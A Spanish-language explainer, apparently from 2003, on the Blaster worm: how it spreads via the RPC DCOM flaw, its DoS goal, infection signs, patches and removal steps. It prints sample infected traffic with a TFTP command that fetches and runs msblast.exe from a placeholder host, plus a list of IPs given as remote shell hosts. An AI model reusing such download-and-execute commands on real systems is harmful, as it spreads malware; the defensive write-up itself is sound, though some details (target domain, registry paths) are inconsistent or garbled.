Hace ya tiempo Microsoft anunciaba una grave vulnerabilidad denominada RPC DOM en los sistemas Windows NT/2000/XP/2003. Por entonces los expertos en seguridad ya preveían algún gusano que explotase dicha falla. No ha tardado mucho, este mismo lunes el gusano Blaster entraba en escena valiéndose de esta vulnerabilidad. La principal manifestación o síntoma que podemos notar son los constantes reinicios de nuestra computadora. ¿Cómo actua? ¿Cuál es su finalidad? ¿Por qué resetea la máquina? ¿Cómo ver si estamos infectados? ¿Cómo prevenirlo? ¿Cómo librarnos de él? (Sigue leyendo).¿CÓMO ACTUA?
El gusano rastrea IP’s en busca de sistemas operativos Windows (sólo versiones NT 4.0 / NT 4.0 Terminal Services Edition / 2000 / XP / Server 2003) con el acceso permitido al puerto 135/TCP. Una vez localizada la futura victima hace uso de la reciente vulnerabilidad “Desbordamiento de Búfer en RPC DCOM” que Windows anunciaba el 16 de Julio. Acto seguido utiliza el puerto 4444/TCP y abre una sesión TFTP con un shell remota, desde donde descarga los binarios de Blaster bajo el nombre de fichero msblast.exe. Este se suele descargar al directorio C:WindowsSystem32 o C:WINNTSystem32 (dependiendo del sistema operativo). Ocupa 6176 Bytes.
Este sería un ejemplo del tráfico detectado en una máquina infectada:
————-tráfico 4444/tcp———-
tftp -i aaa.bbb.ccc.ddd GET msblast.exe
start msblast.exe
msblast.exe
HTTP/1.0 403 Forbidden
Server: AdSubtract 2.50
Content-Type: text/html;charset=utf-8
Content-Length: 349
<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title>Forbidden</title>
</head>
<body>
<h1>Forbidden</h1>
<h2>Requests from host hostname.of.attacking.host/aaa.bbb.ccc.ddd not
allowed; only requests from localhost (127.0.0.1) are allowed.
</h2>
</body></html>
————-tráfico 4444/tcp———-
Las shells remotas donde conectarse pueden ser alguna de las siguientes:
204.210.57.87
217.211.179.193
24.147.64.171
24.147.64.205
24.147.64.208
24.147.65.146
24.147.65.45
24.147.65.9
61.254.65.159
67.119.36.219
68.112.65.38
68.166.102.136
68.166.107.21
68.166.111.175
68.166.120.34
68.166.121.135
68.166.123.4
68.166.124.186
68.166.124.93
68.166.139.155
68.166.139.210
68.166.141.66
68.166.142.194
68.166.142.215
68.166.36.178
68.166.56.123
68.166.60.51
68.166.98.3
¿CÚAL ES SU FINALIDAD?
La principal función para la cual a sido programado este código es la de llevar a cabo un ataque de denegación del servicio orientado hacia el sitio www.microsoftupdate.com. Los ataques están programados en las siguientes fechas:
* En los meses de enero a agosto, el gusano lanzará un ataque de denegación de servicio desde el día 16 de esos meses hasta el 31.
* El resto de meses, de septiembre a diciembre, el gusano lanzará ese ataque todos los días del mes.
¿POR QUÉ RESETEA LA MÁQUINA?
Si bien es cierto que este código está escrito para llevar a cabo un ataque distribuido de denegación de servico contra windowsupdate.com, pero según informa hispasec, posee 2 exploits diferentes con los que atacar, dependiendo del sistema operativo. El problema reside en que no es capaz de distinguir entre sistemas y lanzar uno u otro exploit. Un error al enviar dicho exploit es lo que puede provocar que se detenga svchost.exe, y por tanto se reinicie la computadora. Pero en ningún caso es algo para lo que haya sido diseñado.
¿CÓMO PODEMOS VER SI ESTAMOS INFECTADOS?
Podemos comprobarlo mediante varios puntos:
1. Si experimentamos reinicios constantes e involuntarios en nuestra máquina
2 . Si notamos cierta elevación en el uso de los puertos 135/TCP, 4444/TCP y 69/UDP
3 . Si en el registro de Windows (ejecutar > regedit) en la cadena “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion” aparecen las claves “Run "windows auto update" = msblast.exe” o “Run "windows auto update" = msblast.exe I just want to say LOVE YOU SAN!! Hill”
¿CÓMO PODEMOS PREVENIRLO?
Lo primordial es instalar el parche que Windows ofrece para dicha vulnerabilidad. Dependiendo de la versión del sistema operativo que usemos disponemos de los siguientes parches:
Windows NT 4.0 Server
Windows NT 4.0 Terminal Server Edition
Windows 2000
Windows XP 32 bit Edition
Windows XP 64 bit Edition
Windows Server 2003 32 bit Edition
Windows Server 2003 64 bit Edition
Nota: la mayoría de nosotros trabajamos con 32 bits, a no ser que usemos un procesador de 64 bits como el AMD Opteron.
También podemos desactivar la función de NetBios en las opciones de Windows (propiedades de la conexión de red > protocolos) o bloquear el puerto 135/TCP mediante algún cortafuegos para que sea imposible acceder a él desde el exterior.
¿CÓMO PODEMOS ELIMINARLO?
A través de varios pasos:
Terminar el proceso asociado al gusano
1. Abrir el administrador de tareas de windows (CTRL+SHIFT+ESC) y seleccionar las pestaña "Procesos"
2. En la lista que aparece, seleccionar el proceso MSBLAST.EXE y pulsar el botón "Terminar proceso"
3. Comprobar que se ha finalizado ese proceso (cerrando el administrador de tareas, volviéndolo a abrir y comprobar que no aparece en la lista).
4. Cerrar el administrador de tareas.
Borrar entradas en el registro
1. Abrir el editor del registro (pulsar Inicio->Ejecutar, escribir regedit y pulsar la tecla Enter).
2. En el panel izquierdo, hacer doble click en: HKEY_LOCAL_MACHINE>Software>Microsoft>Windows>CurrentVersion>Run
3. En el panel derecho, localizar y borrar la entrada ”windows auto update" = MSBLAST.EXE
4. Cerrar el editor del registro.
Instrucciones adicionales para usuarios de Windows XP
Para estos usuarios, además de los pasos anteriores, es preciso deshabilitar el "System Restore" de Windows XP. Para ello:
1. Entrar como admistrador del sistema
2. Doble click sobre "Mi PC" (en el escritorio) y pinchar en "Propiedades"
3. Ir a System Restore
4. Seleccionar "Deshabilitar System Restore"
5. Pulsar Aplicar > Sí > Aceptar
Escaneado y borrado definitivo con el antivirus
Indicar al antivirus instalado que haga un escaneado de todo el sistema (asegurarse antes de que el antivirus contenga las últimas actualizaciones). Caso de no tener antivirus, ir al directorio System32 (normalmente C:WindowsSystem32 o C:WINNTSystem32) y ahí borrar completamente el fichero MSBLAST.EXE.
Sitios para hacer un scan y eliminación del virus online:
System Cleaner de Trend Micro
Blaster Removal Tool de Symantec
Herramienta de Computer Associates
PQRemove de Panda Software
Aplicar parche
Por supuesto deberemos aplicar el parche de la vulnerabilidad para que no pueda volver a infectarnos. Los parches para cada sistema operativo están listados en el punto anterior.
Más información en:
Trend Micro
Panda Software
McAfee
Symantec
PerAntivirus
VS Antivirus
Enciclopedia Virus (Ontinent)
Sophos
Computer Associates
Alerta Antivirus
Hispasec
Microsoft